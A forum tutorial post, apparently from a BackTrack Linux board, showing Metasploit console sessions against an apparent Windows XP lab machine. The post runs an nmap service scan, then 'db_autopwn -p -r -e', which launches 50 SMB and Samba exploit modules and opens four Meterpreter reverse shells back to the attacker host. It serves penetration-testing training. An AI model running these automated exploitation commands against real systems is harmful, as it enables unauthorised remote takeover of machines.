My Metasploit tutorial thread

**iproute** · 11-18-2010, 03:50 PM

Code:

msf > db_nmap -A 192.168.25.147

Starting Nmap 5.35DC1 ( http://nmap.org ) at 2010-11-18 08:56 CST
Nmap scan report for victim-30fe648f (192.168.25.147)
Host is up (0.00074s latency).
Not shown: 997 filtered ports
PORT     STATE  SERVICE      VERSION
139/tcp  open   netbios-ssn
445/tcp  open   microsoft-ds Microsoft Windows XP microsoft-ds
2869/tcp closed icslap
MAC Address: 08:00:27:C1:63:8C (Cadmus Computer Systems)
Device type: general purpose
Running: Microsoft Windows XP
OS details: Microsoft Windows XP SP3
Network Distance: 1 hop
Service Info: OS: Windows

Host script results:
|_nbstat: NetBIOS name: VICTIM-30FE648F, NetBIOS user: <unknown>, NetBIOS MAC: 08:00:27:c1:63:8c (Cadmus Computer Systems)
|_smbv2-enabled: Server doesn't support SMBv2 protocol
| smb-os-discovery:  
|   OS: Windows XP (Windows 2000 LAN Manager)
|   Name: MSHOME\VICTIM-30FE648F
|_  System time: 2010-11-18 08:56:26 UTC-8

TRACEROUTE
HOP RTT     ADDRESS
1   0.74 ms victim-30fe648f (192.168.25.147)

OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 52.71 seconds

Then, we check it, and maybe take a look at the open services.

Code:

msf > db_hosts -c address,mac,name,state,updated_at,svcs,vulns

Hosts
=====

address         mac                name             state  updated_at               svcs  vulns
-------         ---                ----             -----  ----------               ----  -----
192.168.25.147  08:00:27:C1:63:8C  victim-30fe648f  alive  2010-11-18 15:34:25 UTC  3     0

msf > db_services 

Services
========

created_at               info                                name          port  proto  state   updated_at               Host            Workspace
----------               ----                                ----          ----  -----  -----   ----------               ----            ---------
2010-11-18 15:34:26 UTC                                      netbios-ssn   139   tcp    open    2010-11-18 15:34:26 UTC  192.168.25.147  default
2010-11-18 15:34:26 UTC  Microsoft Windows XP microsoft-ds   microsoft-ds  445   tcp    open    2010-11-18 15:34:26 UTC  192.168.25.147  default
2010-11-18 15:34:26 UTC                                      icslap        2869  tcp    closed  2010-11-18 15:34:26 UTC  192.168.25.147  default

We'll go ahead and run our db_autopwn now.

Code:

msf > db_autopwn -h[*] Usage: db_autopwn [options]
	-h          Display this help text
	-t          Show all matching exploit modules
	-x          Select modules based on vulnerability references
	-p          Select modules based on open ports
	-e          Launch exploits against all matched targets
	-r          Use a reverse connect shell
	-b          Use a bind shell on a random port (default)
	-q          Disable exploit module output
	-R  [rank]  Only run modules with a minimal rank
	-I  [range] Only exploit hosts inside this range
	-X  [range] Always exclude hosts inside this range
	-PI [range] Only exploit hosts with these ports open
	-PX [range] Always exclude hosts with these ports open
	-m  [regex] Only run modules whose name matches the regex
	-T  [secs]  Maximum runtime for any exploit in seconds

msf > db_autopwn -p -r -e
[*] (1/50 [0 sessions]): Launching exploit/freebsd/samba/trans2open against 192.168.25.147:139...
[*] (2/50 [0 sessions]): Launching exploit/linux/samba/chain_reply against 192.168.25.147:139...
[*] (3/50 [0 sessions]): Launching exploit/linux/samba/lsa_transnames_heap against 192.168.25.147:139...
[*] (4/50 [0 sessions]): Launching exploit/linux/samba/trans2open against 192.168.25.147:139...
[*] (5/50 [0 sessions]): Launching exploit/multi/samba/nttrans against 192.168.25.147:139...
[*] (6/50 [0 sessions]): Launching exploit/multi/samba/usermap_script against 192.168.25.147:139...
[*] (7/50 [0 sessions]): Launching exploit/netware/smb/lsass_cifs against 192.168.25.147:139...
[*] (8/50 [0 sessions]): Launching exploit/osx/samba/lsa_transnames_heap against 192.168.25.147:139...
[*] (9/50 [0 sessions]): Launching exploit/solaris/samba/trans2open against 192.168.25.147:139...
[*] (10/50 [0 sessions]): Launching exploit/windows/brightstor/ca_arcserve_342 against 192.168.25.147:139...
[*] (11/50 [0 sessions]): Launching exploit/windows/brightstor/etrust_itm_alert against 192.168.25.147:139...
[*] (12/50 [0 sessions]): Launching exploit/windows/smb/ms03_049_netapi against 192.168.25.147:139...
[*] (13/50 [0 sessions]): Launching exploit/windows/smb/ms04_011_lsass against 192.168.25.147:139...
[*] (14/50 [0 sessions]): Launching exploit/windows/smb/ms04_031_netdde against 192.168.25.147:139...
[*] (15/50 [0 sessions]): Launching exploit/windows/smb/ms05_039_pnp against 192.168.25.147:139...
[*] (16/50 [0 sessions]): Launching exploit/windows/smb/ms06_040_netapi against 192.168.25.147:139...
[*] (17/50 [0 sessions]): Launching exploit/windows/smb/ms06_066_nwapi against 192.168.25.147:139...
[*] (18/50 [0 sessions]): Launching exploit/windows/smb/ms06_066_nwwks against 192.168.25.147:139...
[*] (19/50 [0 sessions]): Launching exploit/windows/smb/ms06_070_wkssvc against 192.168.25.147:139...
[*] (20/50 [0 sessions]): Launching exploit/windows/smb/ms07_029_msdns_zonename against 192.168.25.147:139...
[*] (21/50 [0 sessions]): Launching exploit/windows/smb/ms08_067_netapi against 192.168.25.147:139...
[*] (22/50 [0 sessions]): Launching exploit/windows/smb/ms10_061_spoolss against 192.168.25.147:139...
[*] (23/50 [0 sessions]): Launching exploit/windows/smb/netidentity_xtierrpcpipe against 192.168.25.147:139...
[*] (24/50 [0 sessions]): Launching exploit/windows/smb/psexec against 192.168.25.147:139...
[*] (25/50 [0 sessions]): Launching exploit/windows/smb/timbuktu_plughntcommand_bof against 192.168.25.147:139...
[*] (26/50 [0 sessions]): Launching exploit/freebsd/samba/trans2open against 192.168.25.147:445...
[*] (27/50 [0 sessions]): Launching exploit/linux/samba/chain_reply against 192.168.25.147:445...
[*] (28/50 [0 sessions]): Launching exploit/linux/samba/lsa_transnames_heap against 192.168.25.147:445...
[*] (29/50 [0 sessions]): Launching exploit/linux/samba/trans2open against 192.168.25.147:445...
[*] (30/50 [0 sessions]): Launching exploit/multi/samba/nttrans against 192.168.25.147:445...
[*] (31/50 [0 sessions]): Launching exploit/multi/samba/usermap_script against 192.168.25.147:445...
[*] (32/50 [0 sessions]): Launching exploit/netware/smb/lsass_cifs against 192.168.25.147:445...
[*] (33/50 [0 sessions]): Launching exploit/osx/samba/lsa_transnames_heap against 192.168.25.147:445...
[*] (34/50 [0 sessions]): Launching exploit/solaris/samba/trans2open against 192.168.25.147:445...
[*] (35/50 [0 sessions]): Launching exploit/windows/brightstor/ca_arcserve_342 against 192.168.25.147:445...
[*] (36/50 [0 sessions]): Launching exploit/windows/brightstor/etrust_itm_alert against 192.168.25.147:445...
[*] (37/50 [0 sessions]): Launching exploit/windows/smb/ms03_049_netapi against 192.168.25.147:445...
[*] (38/50 [0 sessions]): Launching exploit/windows/smb/ms04_011_lsass against 192.168.25.147:445...
[*] (39/50 [0 sessions]): Launching exploit/windows/smb/ms04_031_netdde against 192.168.25.147:445...
[*] (40/50 [0 sessions]): Launching exploit/windows/smb/ms05_039_pnp against 192.168.25.147:445...
[*] (41/50 [0 sessions]): Launching exploit/windows/smb/ms06_040_netapi against 192.168.25.147:445...
[*] (42/50 [0 sessions]): Launching exploit/windows/smb/ms06_066_nwapi against 192.168.25.147:445...
[*] (43/50 [0 sessions]): Launching exploit/windows/smb/ms06_066_nwwks against 192.168.25.147:445...
[*] (44/50 [0 sessions]): Launching exploit/windows/smb/ms06_070_wkssvc against 192.168.25.147:445...
[*] (45/50 [0 sessions]): Launching exploit/windows/smb/ms07_029_msdns_zonename against 192.168.25.147:445...
[*] (46/50 [0 sessions]): Launching exploit/windows/smb/ms08_067_netapi against 192.168.25.147:445...
[*] (47/50 [0 sessions]): Launching exploit/windows/smb/ms10_061_spoolss against 192.168.25.147:445...
[*] (48/50 [0 sessions]): Launching exploit/windows/smb/netidentity_xtierrpcpipe against 192.168.25.147:445...
[*] (49/50 [0 sessions]): Launching exploit/windows/smb/psexec against 192.168.25.147:445...
[*] (50/50 [0 sessions]): Launching exploit/windows/smb/timbuktu_plughntcommand_bof against 192.168.25.147:445...
[*] (50/50 [0 sessions]): Waiting on 23 launched modules to finish execution...
[*] (50/50 [1 sessions]): Waiting on 13 launched modules to finish execution...
[*] Meterpreter session 1 opened (192.168.25.133:5503 -> 192.168.25.147:1034) at 2010-11-18 08:58:58 -0600
[*] (50/50 [1 sessions]): Waiting on 12 launched modules to finish execution...
[*] Meterpreter session 2 opened (192.168.25.133:23683 -> 192.168.25.147:1035) at 2010-11-18 08:59:02 -0600
[*] (50/50 [2 sessions]): Waiting on 11 launched modules to finish execution...
[*] (50/50 [2 sessions]): Waiting on 8 launched modules to finish execution...
[*] Meterpreter session 4 opened (192.168.25.133:14963 -> 192.168.25.147:1038) at 2010-11-18 09:00:05 -0600
[*] Meterpreter session 3 opened (192.168.25.133:8853 -> 192.168.25.147:1037) at 2010-11-18 09:00:05 -0600
[*] (50/50 [4 sessions]): Waiting on 6 launched modules to finish execution...
[*] (50/50 [4 sessions]): Waiting on 5 launched modules to finish execution...
[*] (50/50 [4 sessions]): Waiting on 4 launched modules to finish execution...
[*] (50/50 [4 sessions]): Waiting on 3 launched modules to finish execution...
[*] (50/50 [4 sessions]): Waiting on 1 launched modules to finish execution...
[*] (50/50 [4 sessions]): Waiting on 0 launched modules to finish execution...

..continued..

BackTrack Linux - Penetration Testing Distribution

Thread: My Metasploit tutorial thread

Thread Tools

Search Thread

Display

Threaded View

Re: My Metasploit tutorial thread

Similar Threads

[Tutorial] Curso Metasploit Framework (traduzido)

Metasploit auxilary file_autopwn module - Video Tutorial

Tutorial Request Thread

Metasploit problem with getting a tutorial to work

Metasploit 3 tutorial for beginner?

Posting Permissions